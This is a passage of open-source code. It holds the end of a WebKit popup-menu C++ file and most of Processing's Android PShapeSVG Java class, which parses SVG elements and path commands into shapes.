Move to page coordinates\n IntRect pageCoordinates(view->contentsToWindow(rect.location()), rect.size());\n\n PlatformPopupMenuData platformData;\n setUpPlatformData(pageCoordinates, platformData);\n\n WebProcess::singleton().parentProcessConnection()->send(Messages::WebPageProxy::ShowPopupMenu(pageCoordinates, m_popupClient->menuStyle().textDirection(), items, index, platformData), m_page->pageID());\n}\n\nvoid WebPopupMenu::hide()\n{\n if (!m_page || !m_popupClient)\n return;\n\n WebProcess::singleton().parentProcessConnection()->send(Messages::WebPageProxy::HidePopupMenu(), m_page->pageID());\n m_page->setActivePopupMenu(0);\n}\n\nvoid WebPopupMenu::updateFromElement()\n{\n}\n\n} // namespace WebKit\n"} {"text": "/* -*- mode: java; c-basic-offset: 2; indent-tabs-mode: nil -*- */\n\n/*\n Part of the Processing project - http://processing.org\n\n Copyright (c) 2012-19 The Processing Foundation\n Copyright (c) 2006-12 Ben Fry and Casey Reas\n Copyright (c) 2004-06 Michael Chang\n\n This library is free software; you can redistribute it and/or\n modify it under the terms of the GNU Lesser General Public\n License version 2.1 as published by the Free Software Foundation.\n\n This library is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n Lesser General Public License for more details.\n\n You should have received a copy of the GNU Lesser General\n Public License along with this library; if not, write to the\n Free Software Foundation, Inc., 59 Temple Place, Suite 330,\n Boston, MA 02111-1307 USA\n*/\n\npackage processing.core;\n\n//import static java.awt.Font.BOLD;\n//import static java.awt.Font.ITALIC;\n//import static java.awt.Font.PLAIN;\nimport processing.data.*;\n\n// TODO replace these with PMatrix2D\nimport android.graphics.Matrix;\n//import java.awt.geom.AffineTransform;\n//import java.awt.geom.Point2D;\n\nimport java.util.Map;\nimport java.util.HashMap;\nimport java.util.regex.Matcher;\nimport java.util.regex.Pattern;\n\n\n/**\n * This class is not part of the Processing API and should not be used\n * directly. Instead, use loadShape() and methods like it, which will make\n * use of this class. Using this class directly will cause your code to break\n * when combined with future versions of Processing.\n *

\n * SVG stands for Scalable Vector Graphics, a portable graphics format.\n * It is a vector format so it allows for \"infinite\" resolution and relatively\n * small file sizes. Most modern media software can view SVG files, including\n * Adobe products, Firefox, etc. Illustrator and Inkscape can edit SVG files.\n * View the SVG specification here.\n *

\n * We have no intention of turning this into a full-featured SVG library.\n * The goal of this project is a basic shape importer that originally was small\n * enough to be included with applets, meaning that its download size should be\n * in the neighborhood of 25-30 Kb. Though we're far less limited nowadays on\n * size constraints, we remain extremely limited in terms of time, and do not\n * have volunteers who are available to maintain a larger SVG library.\n *

\n * For more sophisticated import/export, consider the\n * Batik\n * library from the Apache Software Foundation.\n *

\n * Batik is used in the SVG Export library in Processing 3, however using it\n * for full SVG import is still a considerable amount of work. Wiring it to\n * Java2D wouldn't be too bad, but using it with OpenGL, JavaFX, and features\n * like begin/endRecord() and begin/endRaw() would be considerable effort.\n *

\n * Future improvements to this library may focus on this properly supporting\n * a specific subset of SVG, for instance the simpler SVG profiles known as\n * SVG Tiny or Basic,\n * although we still would not support the interactivity options.\n *\n *


\n *\n * A minimal example program using SVG:\n * (assuming a working moo.svg is in your data folder)\n *\n *

\n * PShape moo;\n *\n * void setup() {\n *   size(400, 400);\n *   moo = loadShape(\"moo.svg\");\n * }\n * void draw() {\n *   background(255);\n *   shape(moo, mouseX, mouseY);\n * }\n * 
\n */\npublic class PShapeSVG extends PShape {\n XML element;\n\n /// Values between 0 and 1.\n protected float opacity;\n float strokeOpacity;\n float fillOpacity;\n\n /** Width of containing SVG (used for percentages). */\n protected float svgWidth;\n\n /** Height of containing SVG (used for percentages). */\n protected float svgHeight;\n\n /** √((w² + h²)/2) of containing SVG (used for percentages). */\n protected float svgSizeXY;\n\n protected Gradient strokeGradient;\n String strokeName; // id of another object, gradients only?\n\n protected Gradient fillGradient;\n String fillName; // id of another object\n\n\n /**\n * Initializes a new SVG object from the given XML object.\n */\n public PShapeSVG(XML svg) {\n this(null, svg, true);\n\n if (!svg.getName().equals(\"svg\")) {\n if (svg.getName().toLowerCase().equals(\"html\")) {\n // Common case is that files aren't downloaded properly\n throw new RuntimeException(\"This appears to be a web page, not an SVG file.\");\n } else {\n throw new RuntimeException(\"The root node is not , it's <\" + svg.getName() + \">\");\n }\n }\n }\n\n\n protected PShapeSVG(PShapeSVG parent, XML properties, boolean parseKids) {\n setParent(parent);\n\n // Need to get width/height in early.\n if (properties.getName().equals(\"svg\")) {\n String unitWidth = properties.getString(\"width\");\n String unitHeight = properties.getString(\"height\");\n\n // Can't handle width/height as percentages easily. I'm just going\n // to put in 100 as a dummy value, beacuse this means that it will\n // come out as a reasonable value.\n if (unitWidth != null) width = parseUnitSize(unitWidth, 100);\n if (unitHeight != null) height = parseUnitSize(unitHeight, 100);\n\n String viewBoxStr = properties.getString(\"viewBox\");\n if (viewBoxStr != null) {\n float[] viewBox = PApplet.parseFloat(PApplet.splitTokens(viewBoxStr));\n if (unitWidth == null || unitHeight == null) {\n // Not proper parsing of the viewBox, but will cover us for cases where\n // the width and height of the object is not specified.\n width = viewBox[2];\n height = viewBox[3];\n } else {\n // http://www.w3.org/TR/SVG/coords.html#ViewBoxAttribute\n // TODO: preserveAspectRatio.\n if (matrix == null) matrix = new PMatrix2D();\n matrix.scale(width/viewBox[2], height/viewBox[3]);\n matrix.translate(-viewBox[0], -viewBox[1]);\n }\n }\n\n // Negative size is illegal.\n if (width < 0 || height < 0)\n throw new RuntimeException(\": width (\" + width +\n \") and height (\" + height + \") must not be negative.\");\n\n // It's technically valid to have width or height == 0. Not specified at\n // all is what to test for.\n if ((unitWidth == null || unitHeight == null) && viewBoxStr == null) {\n //throw new RuntimeException(\"width/height not specified\");\n PGraphics.showWarning(\"The width and/or height is not \" +\n \"readable in the tag of this file.\");\n // For the spec, the default is 100% and 100%. 
For purposes\n // here, insert a dummy value because this is prolly just a\n // font or something for which the w/h doesn't matter.\n width = 1;\n height = 1;\n }\n\n svgWidth = width;\n svgHeight = height;\n svgSizeXY = PApplet.sqrt((svgWidth*svgWidth + svgHeight*svgHeight)/2.0f);\n }\n\n element = properties;\n name = properties.getString(\"id\");\n // @#$(* adobe illustrator mangles names of objects when re-saving\n if (name != null) {\n while (true) {\n String[] m = PApplet.match(name, \"_x([A-Za-z0-9]{2})_\");\n if (m == null) break;\n char repair = (char) PApplet.unhex(m[1]);\n name = name.replace(m[0], \"\" + repair);\n }\n }\n\n String displayStr = properties.getString(\"display\", \"inline\");\n visible = !displayStr.equals(\"none\");\n\n String transformStr = properties.getString(\"transform\");\n if (transformStr != null) {\n if (matrix == null) {\n matrix = parseTransform(transformStr);\n } else {\n matrix.preApply(parseTransform(transformStr));\n }\n }\n\n if (parseKids) {\n parseColors(properties);\n parseChildren(properties);\n }\n }\n\n\n // Broken out so that subclasses can copy any additional variables\n // (i.e. fillGradientPaint and strokeGradientPaint)\n protected void setParent(PShapeSVG parent) {\n // Need to set this so that findChild() works.\n // Otherwise 'parent' is null until addChild() is called later.\n this.parent = parent;\n\n if (parent == null) {\n // set values to their defaults according to the SVG spec\n stroke = false;\n strokeColor = 0xff000000;\n strokeWeight = 1;\n strokeCap = PConstants.SQUARE; // equivalent to BUTT in svg spec\n strokeJoin = PConstants.MITER;\n strokeGradient = null;\n// strokeGradientPaint = null;\n strokeName = null;\n\n fill = true;\n fillColor = 0xff000000;\n fillGradient = null;\n// fillGradientPaint = null;\n fillName = null;\n\n //hasTransform = false;\n //transformation = null; //new float[] { 1, 0, 0, 1, 0, 0 };\n\n // svgWidth, svgHeight, and svgXYSize done below.\n\n strokeOpacity = 1;\n fillOpacity = 1;\n opacity = 1;\n\n } else {\n stroke = parent.stroke;\n strokeColor = parent.strokeColor;\n strokeWeight = parent.strokeWeight;\n strokeCap = parent.strokeCap;\n strokeJoin = parent.strokeJoin;\n strokeGradient = parent.strokeGradient;\n// strokeGradientPaint = parent.strokeGradientPaint;\n strokeName = parent.strokeName;\n\n fill = parent.fill;\n fillColor = parent.fillColor;\n fillGradient = parent.fillGradient;\n// fillGradientPaint = parent.fillGradientPaint;\n fillName = parent.fillName;\n\n svgWidth = parent.svgWidth;\n svgHeight = parent.svgHeight;\n svgSizeXY = parent.svgSizeXY;\n\n opacity = parent.opacity;\n }\n\n // The rect and ellipse modes are set to CORNER since it is the expected\n // mode for svg shapes.\n rectMode = CORNER;\n ellipseMode = CORNER;\n }\n\n\n /** Factory method for subclasses. 
*/\n protected PShapeSVG createShape(PShapeSVG parent, XML properties, boolean parseKids) {\n return new PShapeSVG(parent, properties, parseKids);\n }\n\n\n protected void parseChildren(XML graphics) {\n XML[] elements = graphics.getChildren();\n children = new PShape[elements.length];\n childCount = 0;\n\n for (XML elem : elements) {\n PShape kid = parseChild(elem);\n if (kid != null) addChild(kid);\n }\n children = (PShape[]) PApplet.subset(children, 0, childCount);\n }\n\n\n /**\n * Parse a child XML element.\n * Override this method to add parsing for more SVG elements.\n */\n protected PShape parseChild(XML elem) {\n// System.err.println(\"parsing child in pshape \" + elem.getName());\n String name = elem.getName();\n PShapeSVG shape = null;\n\n\n if (name == null) {\n // just some whitespace that can be ignored (hopefully)\n\n } else if (name.equals(\"g\")) {\n shape = createShape(this, elem, true);\n\n } else if (name.equals(\"defs\")) {\n // generally this will contain gradient info, so may\n // as well just throw it into a group element for parsing\n shape = createShape(this, elem, true);\n\n } else if (name.equals(\"line\")) {\n shape = createShape(this, elem, true);\n shape.parseLine();\n\n } else if (name.equals(\"circle\")) {\n shape = createShape(this, elem, true);\n shape.parseEllipse(true);\n\n } else if (name.equals(\"ellipse\")) {\n shape = createShape(this, elem, true);\n shape.parseEllipse(false);\n\n } else if (name.equals(\"rect\")) {\n shape = createShape(this, elem, true);\n shape.parseRect();\n\n } else if (name.equals(\"image\")) {\n shape = createShape(this, elem, true);\n shape.parseImage();\n\n } else if (name.equals(\"polygon\")) {\n shape = createShape(this, elem, true);\n shape.parsePoly(true);\n\n } else if (name.equals(\"polyline\")) {\n shape = createShape(this, elem, true);\n shape.parsePoly(false);\n\n } else if (name.equals(\"path\")) {\n shape = createShape(this, elem, true);\n shape.parsePath();\n\n } else if (name.equals(\"radialGradient\")) {\n return new RadialGradient(this, elem);\n\n } else if (name.equals(\"linearGradient\")) {\n return new LinearGradient(this, elem);\n\n } else if (name.equals(\"font\")) {\n return new Font(this, elem);\n\n// } else if (name.equals(\"font-face\")) {\n// return new FontFace(this, elem);\n\n// } else if (name.equals(\"glyph\") || name.equals(\"missing-glyph\")) {\n// return new FontGlyph(this, elem);\n\n } else if (name.equals(\"text\")) { // || name.equals(\"font\")) {\n return new Text(this, elem);\n\n } else if (name.equals(\"tspan\")) {\n// return new LineOfText(this, elem);\n PGraphics.showWarning(\"tspan elements are not supported.\");\n\n } else if (name.equals(\"filter\")) {\n PGraphics.showWarning(\"Filters are not supported.\");\n\n } else if (name.equals(\"mask\")) {\n PGraphics.showWarning(\"Masks are not supported.\");\n\n } else if (name.equals(\"pattern\")) {\n PGraphics.showWarning(\"Patterns are not supported.\");\n\n } else if (name.equals(\"stop\")) {\n // stop tag is handled by gradient parser, so don't warn about it\n\n } else if (name.equals(\"sodipodi:namedview\")) {\n // these are always in Inkscape files, the warnings get tedious\n\n } else if (name.equals(\"metadata\")\n || name.equals(\"title\") || name.equals(\"desc\")) {\n // fontforge just stuffs in as a comment.\n // All harmless stuff, irrelevant to rendering.\n return null;\n\n } else if (!name.startsWith(\"#\")) {\n PGraphics.showWarning(\"Ignoring <\" + name + \"> tag.\");\n// new Exception().printStackTrace();\n }\n return 
shape;\n }\n\n\n protected void parseLine() {\n kind = LINE;\n family = PRIMITIVE;\n params = new float[] {\n getFloatWithUnit(element, \"x1\", svgWidth),\n getFloatWithUnit(element, \"y1\", svgHeight),\n getFloatWithUnit(element, \"x2\", svgWidth),\n getFloatWithUnit(element, \"y2\", svgHeight)\n };\n }\n\n\n /**\n * Handles parsing ellipse and circle tags.\n * @param circle true if this is a circle and not an ellipse\n */\n protected void parseEllipse(boolean circle) {\n kind = ELLIPSE;\n family = PRIMITIVE;\n params = new float[4];\n\n params[0] = getFloatWithUnit(element, \"cx\", svgWidth);\n params[1] = getFloatWithUnit(element, \"cy\", svgHeight);\n\n float rx, ry;\n if (circle) {\n rx = ry = getFloatWithUnit(element, \"r\", svgSizeXY);\n } else {\n rx = getFloatWithUnit(element, \"rx\", svgWidth);\n ry = getFloatWithUnit(element, \"ry\", svgHeight);\n }\n params[0] -= rx;\n params[1] -= ry;\n\n params[2] = rx*2;\n params[3] = ry*2;\n }\n\n\n protected void parseRect() {\n kind = RECT;\n family = PRIMITIVE;\n params = new float[] {\n getFloatWithUnit(element, \"x\", svgWidth),\n getFloatWithUnit(element, \"y\", svgHeight),\n getFloatWithUnit(element, \"width\", svgWidth),\n getFloatWithUnit(element, \"height\", svgHeight)\n };\n }\n\n\n protected void parseImage() {\n kind = RECT;\n textureMode = NORMAL;\n\n family = PRIMITIVE;\n params = new float[] {\n getFloatWithUnit(element, \"x\", svgWidth),\n getFloatWithUnit(element, \"y\", svgHeight),\n getFloatWithUnit(element, \"width\", svgWidth),\n getFloatWithUnit(element, \"height\", svgHeight)\n };\n\n this.imagePath = element.getString(\"xlink:href\");\n }\n\n /**\n * Parse a polyline or polygon from an SVG file.\n * Syntax defined at http://www.w3.org/TR/SVG/shapes.html#PointsBNF\n * @param close true if shape is closed (polygon), false if not (polyline)\n */\n protected void parsePoly(boolean close) {\n family = PATH;\n this.close = close;\n\n String pointsAttr = element.getString(\"points\");\n if (pointsAttr != null) {\n Pattern pattern = Pattern.compile(\"([+-]?[\\\\d]+(\\\\.[\\\\d]+)?([eE][+-][\\\\d]+)?)(,?\\\\s*)([+-]?[\\\\d]+(\\\\.[\\\\d]+)?([eE][+-][\\\\d]+)?)\");\n Matcher matcher = pattern.matcher(pointsAttr);\n vertexCount = 0;\n while (matcher.find()) {\n vertexCount++;\n }\n matcher.reset();\n vertices = new float[vertexCount][2];\n for (int i = 0; i < vertexCount; i++) {\n matcher.find();\n vertices[i][X] = Float.parseFloat(matcher.group(1));\n vertices[i][Y] = Float.parseFloat(matcher.group(5));\n }\n// String[] pointsBuffer = PApplet.splitTokens(pointsAttr);\n// vertexCount = pointsBuffer.length;\n// vertices = new float[vertexCount][2];\n// for (int i = 0; i < vertexCount; i++) {\n// String pb[] = PApplet.splitTokens(pointsBuffer[i], \", \\t\\r\\n\");\n// vertices[i][X] = Float.parseFloat(pb[0]);\n// vertices[i][Y] = Float.parseFloat(pb[1]);\n// }\n }\n }\n\n\n protected void parsePath() {\n family = PATH;\n kind = 0;\n\n String pathData = element.getString(\"d\");\n if (pathData == null || PApplet.trim(pathData).length() == 0) {\n return;\n }\n char[] pathDataChars = pathData.toCharArray();\n\n StringBuilder pathBuffer = new StringBuilder();\n boolean lastSeparate = false;\n\n for (int i = 0; i < pathDataChars.length; i++) {\n char c = pathDataChars[i];\n boolean separate = false;\n\n if (c == 'M' || c == 'm' ||\n c == 'L' || c == 'l' ||\n c == 'H' || c == 'h' ||\n c == 'V' || c == 'v' ||\n c == 'C' || c == 'c' || // beziers\n c == 'S' || c == 's' ||\n c == 'Q' || c == 'q' || // quadratic beziers\n c == 'T' || c == 
't' ||\n c == 'A' || c == 'a' || // elliptical arc\n c == 'Z' || c == 'z' || // closepath\n c == ',') {\n separate = true;\n if (i != 0) {\n pathBuffer.append(\"|\");\n }\n }\n if (c == 'Z' || c == 'z') {\n separate = false;\n }\n if (c == '-' && !lastSeparate) {\n // allow for 'e' notation in numbers, e.g. 2.10e-9\n // http://dev.processing.org/bugs/show_bug.cgi?id=1408\n if (i == 0 || pathDataChars[i-1] != 'e') {\n pathBuffer.append(\"|\");\n }\n }\n if (c != ',') {\n pathBuffer.append(c); //\"\" + pathDataBuffer.charAt(i));\n }\n if (separate && c != ',' && c != '-') {\n pathBuffer.append(\"|\");\n }\n lastSeparate = separate;\n }\n\n // use whitespace constant to get rid of extra spaces and CR or LF\n String[] pathTokens =\n PApplet.splitTokens(pathBuffer.toString(), \"|\" + WHITESPACE);\n vertices = new float[pathTokens.length][2];\n vertexCodes = new int[pathTokens.length];\n\n float cx = 0;\n float cy = 0;\n int i = 0;\n\n char implicitCommand = '\\0';\n// char prevCommand = '\\0';\n boolean prevCurve = false;\n float ctrlX, ctrlY;\n // store values for closepath so that relative coords work properly\n float movetoX = 0;\n float movetoY = 0;\n\n while (i < pathTokens.length) {\n char c = pathTokens[i].charAt(0);\n if (((c >= '0' && c <= '9') || (c == '-')) && implicitCommand != '\\0') {\n c = implicitCommand;\n i--;\n } else {\n implicitCommand = c;\n }\n switch (c) {\n\n case 'M': // M - move to (absolute)\n cx = PApplet.parseFloat(pathTokens[i + 1]);\n cy = PApplet.parseFloat(pathTokens[i + 2]);\n movetoX = cx;\n movetoY = cy;\n parsePathMoveto(cx, cy);\n implicitCommand = 'L';\n i += 3;\n break;\n\n case 'm': // m - move to (relative)\n cx = cx + PApplet.parseFloat(pathTokens[i + 1]);\n cy = cy + PApplet.parseFloat(pathTokens[i + 2]);\n movetoX = cx;\n movetoY = cy;\n parsePathMoveto(cx, cy);\n implicitCommand = 'l';\n i += 3;\n break;\n\n case 'L':\n cx = PApplet.parseFloat(pathTokens[i + 1]);\n cy = PApplet.parseFloat(pathTokens[i + 2]);\n parsePathLineto(cx, cy);\n i += 3;\n break;\n\n case 'l':\n cx = cx + PApplet.parseFloat(pathTokens[i + 1]);\n cy = cy + PApplet.parseFloat(pathTokens[i + 2]);\n parsePathLineto(cx, cy);\n i += 3;\n break;\n\n // horizontal lineto absolute\n case 'H':\n cx = PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n // horizontal lineto relative\n case 'h':\n cx = cx + PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n case 'V':\n cy = PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n case 'v':\n cy = cy + PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n // C - curve to (absolute)\n case 'C': {\n float ctrlX1 = PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY1 = PApplet.parseFloat(pathTokens[i + 2]);\n float ctrlX2 = PApplet.parseFloat(pathTokens[i + 3]);\n float ctrlY2 = PApplet.parseFloat(pathTokens[i + 4]);\n float endX = PApplet.parseFloat(pathTokens[i + 5]);\n float endY = PApplet.parseFloat(pathTokens[i + 6]);\n parsePathCurveto(ctrlX1, ctrlY1, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 7;\n prevCurve = true;\n }\n break;\n\n // c - curve to (relative)\n case 'c': {\n float ctrlX1 = cx + PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY1 = cy + PApplet.parseFloat(pathTokens[i + 2]);\n float ctrlX2 = cx + PApplet.parseFloat(pathTokens[i + 3]);\n float ctrlY2 = cy + PApplet.parseFloat(pathTokens[i + 4]);\n float endX = cx + PApplet.parseFloat(pathTokens[i + 5]);\n 
float endY = cy + PApplet.parseFloat(pathTokens[i + 6]);\n parsePathCurveto(ctrlX1, ctrlY1, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 7;\n prevCurve = true;\n }\n break;\n\n // S - curve to shorthand (absolute)\n // Draws a cubic Bézier curve from the current point to (x,y). The first\n // control point is assumed to be the reflection of the second control\n // point on the previous command relative to the current point.\n // (x2,y2) is the second control point (i.e., the control point\n // at the end of the curve). S (uppercase) indicates that absolute\n // coordinates will follow; s (lowercase) indicates that relative\n // coordinates will follow. Multiple sets of coordinates may be specified\n // to draw a polybézier. At the end of the command, the new current point\n // becomes the final (x,y) coordinate pair used in the polybézier.\n case 'S': {\n // (If there is no previous command or if the previous command was not\n // an C, c, S or s, assume the first control point is coincident with\n // the current point.)\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float ctrlX2 = PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY2 = PApplet.parseFloat(pathTokens[i + 2]);\n float endX = PApplet.parseFloat(pathTokens[i + 3]);\n float endY = PApplet.parseFloat(pathTokens[i + 4]);\n parsePathCurveto(ctrlX, ctrlY, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // s - curve to shorthand (relative)\n case 's': {\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float ctrlX2 = cx + PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY2 = cy + PApplet.parseFloat(pathTokens[i + 2]);\n float endX = cx + PApplet.parseFloat(pathTokens[i + 3]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 4]);\n parsePathCurveto(ctrlX, ctrlY, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // Q - quadratic curve to (absolute)\n // Draws a quadratic Bézier curve from the current point to (x,y) using\n // (x1,y1) as the control point. Q (uppercase) indicates that absolute\n // coordinates will follow; q (lowercase) indicates that relative\n // coordinates will follow. Multiple sets of coordinates may be specified\n // to draw a polybézier. 
At the end of the command, the new current point\n // becomes the final (x,y) coordinate pair used in the polybézier.\n case 'Q': {\n ctrlX = PApplet.parseFloat(pathTokens[i + 1]);\n ctrlY = PApplet.parseFloat(pathTokens[i + 2]);\n float endX = PApplet.parseFloat(pathTokens[i + 3]);\n float endY = PApplet.parseFloat(pathTokens[i + 4]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // q - quadratic curve to (relative)\n case 'q': {\n ctrlX = cx + PApplet.parseFloat(pathTokens[i + 1]);\n ctrlY = cy + PApplet.parseFloat(pathTokens[i + 2]);\n float endX = cx + PApplet.parseFloat(pathTokens[i + 3]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 4]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // T - quadratic curveto shorthand (absolute)\n // The control point is assumed to be the reflection of the control\n // point on the previous command relative to the current point.\n case 'T': {\n // If there is no previous command or if the previous command was\n // not a Q, q, T or t, assume the control point is coincident\n // with the current point.\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float endX = PApplet.parseFloat(pathTokens[i + 1]);\n float endY = PApplet.parseFloat(pathTokens[i + 2]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 3;\n prevCurve = true;\n }\n break;\n\n // t - quadratic curveto shorthand (relative)\n case 't': {\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float endX = cx + PApplet.parseFloat(pathTokens[i + 1]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 2]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 3;\n prevCurve = true;\n }\n break;\n\n // A - elliptical arc to (absolute)\n case 'A': {\n float rx = PApplet.parseFloat(pathTokens[i + 1]);\n float ry = PApplet.parseFloat(pathTokens[i + 2]);\n float angle = PApplet.parseFloat(pathTokens[i + 3]);\n boolean fa = PApplet.parseFloat(pathTokens[i + 4]) != 0;\n boolean fs = PApplet.parseFloat(pathTokens[i + 5]) != 0;\n float endX = PApplet.parseFloat(pathTokens[i + 6]);\n float endY = PApplet.parseFloat(pathTokens[i + 7]);\n parsePathArcto(cx, cy, rx, ry, angle, fa, fs, endX, endY);\n cx = endX;\n cy = endY;\n i += 8;\n prevCurve = true;\n }\n break;\n\n // a - elliptical arc to (relative)\n case 'a': {\n float rx = PApplet.parseFloat(pathTokens[i + 1]);\n float ry = PApplet.parseFloat(pathTokens[i + 2]);\n float angle = PApplet.parseFloat(pathTokens[i + 3]);\n boolean fa = PApplet.parseFloat(pathTokens[i + 4]) != 0;\n boolean fs = PApplet.parseFloat(pathTokens[i + 5]) != 0;\n float endX = cx + PApplet.parseFloat(pathTokens[i + 6]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 7]);\n parsePathArcto(cx, cy, 
rx, ry, angle, fa, fs, endX, endY);\n cx = endX;\n cy = endY;\n i += 8;\n prevCurve = true;\n }\n break;\n\n case 'Z':\n case 'z':\n // since closing the path, the 'current' point needs\n // to return back to the last moveto location.\n // http://code.google.com/p/processing/issues/detail?id=1058\n cx = movetoX;\n cy = movetoY;\n close = true;\n i++;\n break;\n\n default:\n String parsed =\n PApplet.join(PApplet.subset(pathTokens, 0, i), \",\");\n String unparsed =\n PApplet.join(PApplet.subset(pathTokens, i), \",\");\n System.err.println(\"parsed: \" + parsed);\n System.err.println(\"unparsed: \" + unparsed);\n throw new RuntimeException(\"shape command not handled: \" + pathTokens[i]);\n }\n// prevCommand = c;\n }\n }\n\n\n// private void parsePathCheck(int num) {\n// if (vertexCount + num-1 >= vertices.length) {\n// //vertices = (float[][]) PApplet.expand(vertices);\n// float[][] temp = new float[vertexCount << 1][2];\n// System.arraycopy(vertices, 0, temp, 0, vertexCount);\n// vertices = temp;\n// }\n// }\n\n private void parsePathVertex(float x, float y) {\n if (vertexCount == vertices.length) {\n //vertices = (float[][]) PApplet.expand(vertices);\n float[][] temp = new float[vertexCount << 1][2];\n System.arraycopy(vertices, 0, temp, 0, vertexCount);\n vertices = temp;\n }\n vertices[vertexCount][X] = x;\n vertices[vertexCount][Y] = y;\n vertexCount++;\n }\n\n\n private void parsePathCode(int what) {\n if (vertexCodeCount == vertexCodes.length) {\n vertexCodes = PApplet.expand(vertexCodes);\n }\n vertexCodes[vertexCodeCount++] = what;\n }\n\n\n private void parsePathMoveto(float px, float py) {\n if (vertexCount > 0) {\n parsePathCode(BREAK);\n }\n parsePathCode(VERTEX);\n parsePathVertex(px, py);\n }\n\n\n private void parsePathLineto(float px, float py) {\n parsePathCode(VERTEX);\n parsePathVertex(px, py);\n }\n\n\n private void parsePathCurveto(float x1, float y1,\n float x2, float y2,\n float x3, float y3) {\n parsePathCode(BEZIER_VERTEX);\n parsePathVertex(x1, y1);\n parsePathVertex(x2, y2);\n parsePathVertex(x3, y3);\n }\n\n// private void parsePathQuadto(float x1, float y1,\n// float cx, float cy,\n// float x2, float y2) {\n// //System.out.println(\"quadto: \" + x1 + \",\" + y1 + \" \" + cx + \",\" + cy + \" \" + x2 + \",\" + y2);\n//// parsePathCode(BEZIER_VERTEX);\n// parsePathCode(QUAD_BEZIER_VERTEX);\n// // x1/y1 already covered by last moveto, lineto, or curveto\n//\n// parsePathVertex(x1 + ((cx-x1)*2/3.0f), y1 + ((cy-y1)*2/3.0f));\n// parsePathVertex(x2 + ((cx-x2)*2/3.0f), y2 + ((cy-y2)*2/3.0f));\n// parsePathVertex(x2, y2);\n// }\n\n private void parsePathQuadto(float cx, float cy,\n float x2, float y2) {\n //System.out.println(\"quadto: \" + x1 + \",\" + y1 + \" \" + cx + \",\" + cy + \" \" + x2 + \",\" + y2);\n// parsePathCode(BEZIER_VERTEX);\n parsePathCode(QUADRATIC_VERTEX);\n // x1/y1 already covered by last moveto, lineto, or curveto\n parsePathVertex(cx, cy);\n parsePathVertex(x2, y2);\n }\n\n\n // Approximates elliptical arc by several bezier segments.\n // Meets SVG standard requirements from:\n // http://www.w3.org/TR/SVG/paths.html#PathDataEllipticalArcCommands\n // http://www.w3.org/TR/SVG/implnote.html#ArcImplementationNotes\n // Based on arc to bezier curve equations from:\n // http://www.spaceroots.org/documents/ellipse/node22.html\n private void parsePathArcto(float x1, float y1,\n float rx, float ry,\n float angle,\n boolean fa, boolean fs,\n float x2, float y2) {\n if (x1 == x2 && y1 == y2) return;\n if (rx == 0 || ry == 0) { parsePathLineto(x2, y2); 
